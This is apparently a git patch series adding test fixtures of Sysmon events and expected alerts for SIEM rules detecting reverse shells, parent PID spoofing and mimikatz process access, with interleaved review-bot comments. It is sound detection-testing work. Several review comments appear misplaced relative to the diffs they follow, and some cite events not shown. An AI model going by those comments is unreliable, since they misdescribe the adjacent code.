20:39:30.305\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-1282-5d1d-0000-0010dd401b00}\"},{\"Name\":\"ProcessId\",\"text\":\"2328\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"Protocol\",\"text\":\"tcp\"},{\"Name\":\"Initiated\",\"text\":\"true\"},{\"Name\":\"SourceIsIpv6\",\"text\":\"false\"},{\"Name\":\"SourceIp\",\"text\":\"10.0.2.13\"},{\"Name\":\"SourceHostname\",\"text\":\"IEWIN7\"},{\"Name\":\"SourcePort\",\"text\":\"49159\"},{\"Name\":\"SourcePortName\"},{\"Name\":\"DestinationIsIpv6\",\"text\":\"false\"},{\"Name\":\"DestinationIp\",\"text\":\"10.0.2.18\"},{\"Name\":\"DestinationHostname\"},{\"Name\":\"DestinationPort\",\"text\":\"8181\"},{\"Name\":\"DestinationPortName\"}]}}}", "category.generic": "Connection", "category.high": "Network Interaction Management", "category.low": "State", "direction": "egress", "dst.host": "10.0.2.18", "dst.ip": "10.0.2.18", "dst.port": 8181, "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_3_Network_connection", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "3", "normalized": true, "object": "connection", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "object.process.guid": "365abb72-1282-5d1d-0000-0010dd401b00", "object.process.id": "2328", "object.process.name": "rundll32.exe", "object.process.path": "c:\\windows\\system32\\", "protocol": "tcp", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T15:52:44.707Z", "src.host": "iewin7", "src.hostname": "iewin7", "src.ip": "10.0.2.13", "src.port": 49159, "status": "success", "subject": "rule", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-07-03T20:39:30.305Z", "type": "raw", "uuid": "9087bbc1-2e29-478a-b817-7046e83dfbf3"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Reflective Code Loading", "correlation_name": "ReverseShell_created_via_PEInjection", "correlation_type": "incident", "datafield5": "3148", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4530c|C:\\Windows\\system32\\kernel32.dll+51133|C:\\Windows\\system32\\kernel32.dll+5cc37|C:\\Windows\\system32\\kernel32.dll+20ae|UNKNOWN(0053108F)|UNKNOWN(00531147)|UNKNOWN(0054001F)|C:\\Windows\\SYSTEM32\\ntdll.dll+63618|C:\\Windows\\SYSTEM32\\ntdll.dll+635eb", "direction": "egress", "dst.host": "10.0.2.18", "dst.ip": "10.0.2.18", "dst.port": 8181, "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "ReverseShell_created_via_PEInjection|iewin7|2328", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.session_id": "79306", "object.process.cmdline": "rundll32.exe", "object.process.cwd": "C:\\Users\\IEUser\\", "object.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "object.process.hash.md5": "C648901695E275C8F2AD04B687A68CE2", "object.process.hash.sha1": "892503B20247B341CFD20DDA5FDACFA41527A087", "object.process.hash.sha256": "3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670", "object.process.id": "2328", "object.process.meta": "Description:Windows host process (Rundll32) | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "rundll32.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\notepad.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.parent.id": "1632", "object.process.parent.name": "notepad.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "object.property": "GrantedAccess", "object.value": "0x1fffff", "protocol": "tcp", "src.host": "iewin7", "src.hostname": "iewin7", "src.ip": "10.0.2.13", "src.port": 49159, "status": "success", "subject": "process", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "79306"}
From 4cb1f6e1a5beadfec799f224886e0dde54993fce Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 12:15:47 +0300 Subject: [PATCH 26/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Subrule=5FParentPid=5FS?= =?UTF-8?q?poofing)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Subrule_ParentPid_Spoofing/tests/test_1.sc | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Subrule_ParentPid_Spoofing/tests/test_1.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Subrule_ParentPid_Spoofing/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Subrule_ParentPid_Spoofing/tests/test_1.sc
new file mode 100644
index 00000000..7df816ab
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Subrule_ParentPid_Spoofing/tests/test_1.sc
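Review bot: Only one event ordering is exercised: the file replays process access (EventRecordID 8353), then process creation (8352), then the network connection (8354), which inverts the record order of the first two; if the rule's chaining depends on seeing the creation of rundll32.exe before the access to it (not determinable from the test alone), a second test replaying the same events in record order would pin that the rule fires either way. There is also no negative case: a variant that omits the `"action": "detect"` network event, or attributes it to a process GUID other than `365abb72-1282-5d1d-0000-0010dd401b00`, and asserts `expect 0` would show that the incident requires the full chain rather than firing on the `0x1fffff` process access alone. The `expect` line drops the raw event's `object.process.hash.imphash` while keeping the other three hashes; a short comment stating whether `expect` is a subset or exact match would tell the next reader whether that omission is deliberate.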
@@ -0,0 +1,5 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-03-21T21:45:04.9232227Z\"},\"EventRecordID\":\"244867\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2844\",\"ThreadID\":\"3648\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-03-21 21:45:04.906\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-26fd-5e76-0000-00100a320d01}\"},{\"Name\":\"SourceProcessId\",\"text\":\"8004\"},{\"Name\":\"SourceThreadId\",\"text\":\"108\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-8ae0-5e76-0000-0010933b8003}\"},{\"Name\":\"TargetProcessId\",\"text\":\"7708\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fa4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+48142|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+45a1a|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+455a6|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+1c153|UNKNOWN(00007FF9A864DCCE)\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "108", "datafield9": 
"C:\\Windows\\SYSTEM32\\ntdll.dll+a0fa4|C:\\Windows\\System32\\KERNELBASE.dll+48142|C:\\Windows\\System32\\KERNELBASE.dll+45a1a|C:\\Windows\\System32\\KERNELBASE.dll+455a6|C:\\Windows\\System32\\KERNEL32.DLL+1c153|UNKNOWN(00007FF9A864DCCE)", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-8ae0-5e76-0000-0010933b8003", "object.process.id": "7708", "object.process.name": "cmd.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T13:01:38.206Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "747f3d96-26fd-5e76-0000-00100a320d01", "subject.process.id": "8004", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-03-21T21:45:04.906Z", "type": "raw", "uuid": "887f2297-d82d-4e58-8980-68b9d6e53fc4"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-03-21T21:45:04.9088577Z\"},\"EventRecordID\":\"244865\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2844\",\"ThreadID\":\"3648\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-03-21 21:45:04.906\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-26fd-5e76-0000-00100a320d01}\"},{\"Name\":\"SourceProcessId\",\"text\":\"8004\"},{\"Name\":\"SourceThreadId\",\"text\":\"108\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-06aa-5e76-0000-001046e10400}\"},{\"Name\":\"TargetProcessId\",\"text\":\"4668\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1f3fff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+9fc14|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+20d5e|C:\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\1cccb0a82af13af5a3d3066dbdb9f984\\\\System.ni.dll+381f60|C:\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\1cccb0a82af13af5a3d3066dbdb9f984\\\\System.ni.dll+2fa12e|C:\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\1cccb0a82af13af5a3d3066dbdb9f984\\\\System.ni.dll+2f8cd5|C:\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\1cccb0a82af13af5a3d3066dbdb9f984\\\\System.ni.dll+2c3b1e|C:\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\1cccb0a82af13af5a3d3
066dbdb9f984\\\\System.ni.dll+2c01f5|UNKNOWN(00007FF9A864D41C)\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "108", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc14|C:\\Windows\\System32\\KERNELBASE.dll+20d5e|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\1cccb0a82af13af5a3d3066dbdb9f984\\System.ni.dll+381f60|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\1cccb0a82af13af5a3d3066dbdb9f984\\System.ni.dll+2fa12e|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\1cccb0a82af13af5a3d3066dbdb9f984\\System.ni.dll+2f8cd5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\1cccb0a82af13af5a3d3066dbdb9f984\\System.ni.dll+2c3b1e|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\1cccb0a82af13af5a3d3066dbdb9f984\\System.ni.dll+2c01f5|UNKNOWN(00007FF9A864D41C)", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\explorer.exe", "object.process.guid": "747f3d96-06aa-5e76-0000-001046e10400", "object.process.id": "4668", "object.process.name": "explorer.exe", "object.process.path": "c:\\windows\\", "object.property": "GrantedAccess", "object.value": "0x1f3fff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T13:01:38.206Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": 
"747f3d96-26fd-5e76-0000-00100a320d01", "subject.process.id": "8004", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-03-21T21:45:04.906Z", "type": "raw", "uuid": "b3953ee7-11bd-4367-a320-00d789a252d2"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Access Token Manipulation: Parent PID Spoofing", "correlation_name": "Subrule_ParentPid_Spoofing", "correlation_type": "subrule", "datafield5": "108", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fa4|C:\\Windows\\System32\\KERNELBASE.dll+48142|C:\\Windows\\System32\\KERNELBASE.dll+45a1a|C:\\Windows\\System32\\KERNELBASE.dll+455a6|C:\\Windows\\System32\\KERNEL32.DLL+1c153|UNKNOWN(00007FF9A864DCCE)", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "info", "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-8ae0-5e76-0000-0010933b8003", "object.process.id": "7708", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.id": "4668", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff|0x1f3fff", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": 
"747f3d96-26fd-5e76-0000-00100a320d01", "subject.process.id": "8004", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\"} \ No newline at end of file From 7e794fbd3453f1174f291b681c596d212733be29 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 12:21:10 +0300 Subject: [PATCH 27/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Suspend=5FProcess)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_defense_evasion/Suspend_Process/tests/test_1.sc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspend_Process/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspend_Process/tests/test_1.sc index aee74788..1e6b5484 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspend_Process/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspend_Process/tests/test_1.sc 
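Review bot: The fixture feeds the two Sysmon EID 10 events in reverse chronological order — the cmd.exe handle (EventRecordID 244867, SystemTime 21:45:04.9232227Z) comes first and the Explorer.EXE handle (EventRecordID 244865, 21:45:04.9088577Z) second — so the test only proves the subrule fires when the child-process access arrives before the parent-process access, which is the opposite of the recorded sequence. If the rule is meant to be order-insensitive, a second test with the two events swapped would pin that; if it is not, the swap is the realistic case and the one that should pass. Also the placeholder comment `# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` is template boilerplate that was committed as-is here and in the Suspicious_Explorer_Injection and Bloodhound fixtures below; replace it with a one-line description of the scenario, e.g. `# powershell.exe (8004) opens handles to cmd.exe (7708, 0x1fffff) and explorer.exe (4668, 0x1f3fff); expect one subrule event naming explorer.exe as parent`.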
@@ -1,3 +1,3 @@ {"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-28T16:29:42.9881250Z\"},\"EventRecordID\":\"7845\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1940\",\"ThreadID\":\"1316\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-28 16:29:42.988\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{365abb72-d3c2-5cc5-0000-0010d9790500}\"},{\"Name\":\"SourceProcessId\",\"text\":\"860\"},{\"Name\":\"SourceThreadId\",\"text\":\"864\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\Win32\\\\mimikatz.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{365abb72-d3e8-5cc5-0000-0010e7d30500}\"},{\"Name\":\"TargetProcessId\",\"text\":\"748\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\notepad.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x800\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+4595c|C:\\\\Windows\\\\system32\\\\KERNELBASE.dll+8185|C:\\\\Users\\\\IEUser\\\\Desktop\\\\Win32\\\\mimikatz.exe+5b414|C:\\\\Users\\\\IEUser\\\\Desktop\\\\Win32\\\\mimikatz.exe+5b376|C:\\\\Users\\\\IEUser\\\\Desktop\\\\Win32\\\\mimikatz.exe+45933\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "864", "datafield9": 
"C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\system32\\KERNELBASE.dll+8185|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b414|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b376|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+45933", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.guid": "365abb72-d3e8-5cc5-0000-0010e7d30500", "object.process.id": "748", "object.process.name": "notepad.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x800", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T09:21:22.800Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\win32\\mimikatz.exe", "subject.process.guid": "365abb72-d3c2-5cc5-0000-0010d9790500", "subject.process.id": "860", "subject.process.name": "mimikatz.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\win32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-28T16:29:42.988Z", "type": "raw", "uuid": "5cad36e4-7a3b-43f7-b185-3cd6eb38fc98"} -expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Process Injection", "correlation_name": "Suspend_Process", "correlation_type": "incident", "datafield5": "864", "datafield9": 
"C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\system32\\KERNELBASE.dll+8185|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b414|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b376|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+45933", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Suspend_Process|iewin7|c:\\users\\ieuser\\desktop\\win32\\mimikatz.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.process.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.guid": "365abb72-d3e8-5cc5-0000-0010e7d30500", "object.process.id": "748", "object.process.name": "notepad.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x800", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\win32\\mimikatz.exe", "subject.process.guid": "365abb72-d3c2-5cc5-0000-0010d9790500", "subject.process.id": "860", "subject.process.name": "mimikatz.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\win32\\"} +expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Process Injection", "correlation_name": "Suspend_Process", "correlation_type": "incident", "datafield5": "864", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\system32\\KERNELBASE.dll+8185|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b414|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b376|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+45933", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": 
"Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Suspend_Process|iewin7|c:\\users\\ieuser\\desktop\\win32\\mimikatz.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.process.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.guid": "365abb72-d3e8-5cc5-0000-0010e7d30500", "object.process.id": "748", "object.process.name": "notepad.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x800", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\win32\\mimikatz.exe", "subject.process.guid": "365abb72-d3c2-5cc5-0000-0010d9790500", "subject.process.id": "860", "subject.process.name": "mimikatz.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\win32\\"} \ No newline at end of file From bd71b6260c15b09417e351a3a812709994d2fcbc Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 12:24:11 +0300 Subject: [PATCH 28/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Suspicious=5FExplorer?= =?UTF-8?q?=5FInjection)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Suspicious_Explorer_Injection/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspicious_Explorer_Injection/tests/test_1.sc 
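Review bot: The only fixture is a single positive event whose source image is literally `mimikatz.exe` with GrantedAccess `0x800`, so the expectation still cannot distinguish a rule that keys on the access mask from one that would fire on any EID 10 from an unusual path. Adding a second event with the same source process but a mask that should not correlate, paired with an expectation of zero correlation events (if the test format supports it), would pin the negative side; the added `"status": "success"` field is otherwise consistent with the other incident expectations in this series. The fixture also pins `incident.aggregation.key` on `subject.process.fullpath`, which is worth keeping in mind when comparing with the Suspicious_Explorer_Injection expectation that keys on the bare process name.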
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspicious_Explorer_Injection/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspicious_Explorer_Injection/tests/test_1.sc new file mode 100644 index 00000000..ac1a1c8f --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspicious_Explorer_Injection/tests/test_1.sc 
